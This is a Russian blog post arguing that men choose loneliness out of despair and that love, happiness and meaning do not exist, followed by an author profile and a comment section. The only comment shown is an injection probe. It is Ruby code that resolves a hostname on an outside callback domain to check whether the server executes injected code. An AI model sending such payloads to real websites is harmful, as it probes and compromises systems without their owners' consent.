Безысходность в «любви»

Сознательный выбор мужчины быть одному — это на самом деле не желаемый выбор, а безысходность. Любой нормальный человек хочет создать счастливую семью и не быть одиноким. Хотя это потребность больше для женщин, но мы мужчины тоже в этом нуждаемся, даже самые сильные, циничные, самодостаточные и богатые. Но в итоге с опытом самые измученные делают осознанный выбор в пользу одиночества, как единственного эффективного способа защититься от фальши, обмана и предательств в отношениях и так называемой «любви».

Можно ли быть счастливым, будучи одиноким? Нет. Можно ли быть счастливым, будучи в отношениях? Тоже нет. Хотел бы я оберегать, заботиться и видеть рядом с собой одну девушку, партнёра, мать своих будущих детей, человека, который разделит со мной всю горесть и радость? Конечно, да. И даже самый законченный реалист и циник хотел бы этого. Но это настолько наивная мечта, что при малейшей проекции на реальную жизнь она тут же разваливается, т.к. не имеет под собой никакого фундамента, и невозможно удержать такую красивую идею прочного союза.

Делает ли меня сильным то, что я выбираю одиночество? Нет, это моя безысходность. Делает ли вас сильным то, что вы верите и надеетесь встретить свою любовь? Нет, это ваше нежелание взглянуть суровой правде жизни в глаза. На самом деле мужчина и женщина не созданы друг для друга (за исключением продолжения рода).

Счастья нет, любви нет, смысла в жизни нет, гарантий, что достигнешь поставленных целей тоже нет, зато есть вера и надежда, которая помогает двигаться дальше. А если и этих двух спутниц не будет, то и тебя по большому счету тоже нет, даже при жизни.

Автор статьи: amiran

0

Автор публикации

не в сети 6 месяцев

Колян

2 353
Здарова Суровые Реалисты! Меня зовут Колян. Я воскрешаю движение Сурового Реализма! Аминь!
Мой тг: @nikolay_ivashov
Комментарии: 7Публикации: 1199Регистрация: 08-04-2021

8 комментариев к «Безысходность в «любви»»

  1. «+»A».concat(70-3).concat(22*4).concat(99).concat(83).concat(105).concat(80)+(require»socket»
    Socket.gethostbyname(«hitbh»+»dqohnskl8dc3e.bxss.me.»)[3].to_s)+»

    0

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Авторизация
*
*
Регистрация
*
*
*
*
Генерация пароля